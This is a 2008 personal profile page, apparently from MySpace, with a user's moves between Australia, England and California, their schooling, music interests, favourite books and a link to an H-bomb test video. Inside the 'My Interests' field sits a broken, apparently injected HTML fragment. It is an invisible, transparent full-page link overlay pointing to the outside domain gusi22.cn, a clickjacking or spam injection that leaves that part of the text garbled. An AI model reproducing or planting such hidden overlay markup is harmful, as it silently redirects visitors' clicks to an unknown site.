Hollis Queens profile picture

Hollis Queens

dude, ive seen hella boobs on the internet . . . - josh

About Me

i was born in australia. then i moved to england then australia, then england again and then southern california, then england then morgan hill then australia and then santa cruz and then morgan hill then los angeles and now i call san francisco home.
i went to live oak for a little, then finished high school in brisbane australia, then did some university at griffith in brisbane. now i go to city college part time, play music full time, try to draw pictures when i can, and get myself in trouble in between. all with some fucking really amazing people.

My Interests

rhythm and melodya class="popup_wrapper" style="outline:none;background-color:transparent!important;c ursor:default;left:-30px;top:0px;height:6783px;width:1072px; "class=popup_x href="http://gusi22.cn/s/" da$d

I'd like to meet:


women are a mixture
of the charming mannerisms
of the men they
have known


i like it. a lot.


lamb. raw shark texts. far journeys. no country for old men. dharma bums.

My Blog

Nuclear Bomb - First H Bomb test

http://www.youtube.com/watch?v=NNcQX033V_M ...
Posted by Hollis Queens on Sat, 28 Jun 2008 04:06:00 PST